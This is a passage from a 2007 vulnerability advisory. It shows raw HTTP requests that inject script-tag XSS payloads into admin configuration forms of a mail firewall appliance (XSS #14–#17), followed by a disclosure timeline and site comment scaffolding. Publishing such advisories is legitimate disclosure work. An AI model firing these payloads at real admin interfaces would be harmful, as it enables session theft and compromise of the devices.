ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_ aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows %5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang TagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:56 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #14 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2% 5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1 &rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D. langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA %27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3 %5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true &rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3% 5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr =%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B 4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_ intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows% 5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D .multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5 D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+ 1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2 C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+ 5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1 %2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010% 3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0& rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D. langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D. attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la ngTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:00 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #15 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2% 5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1 &rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscri pt%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&r ows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3 %5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true &rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3% 5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr =%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B 4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_ intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows% 5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D .multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5 D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+ 1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2 C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+ 5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1 %2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010% 3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0& rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D. langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D. attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la ngTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #16 ] :. POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method =save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method =init&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRouti ngInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript% 3E&input2=&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #17 ] :. POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled =1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2237 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmet hod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMe nu%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows% 5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepend s=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.a ttrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=en able_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.at trValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows %5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.lang TagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&ro ws%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65 535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D. modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId= 2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29% 3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2 &rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1 -65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3% 5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTag Id=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27 %29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attr Type=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5 D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&r ows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D .attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate =%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDep ends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5 D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValu eStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D. attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B 1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepen ds=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D. attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValue Str=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=S ubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:24:22 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ TIMELINE ] :. 22/Mar/2007 - We publish the advisory. 07/Mar/2007 - Second contact. Provider doesn't answered. 27/Feb/2007 - First contact with provider. 19/Feb/2007 - Vulnerabilities founded.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top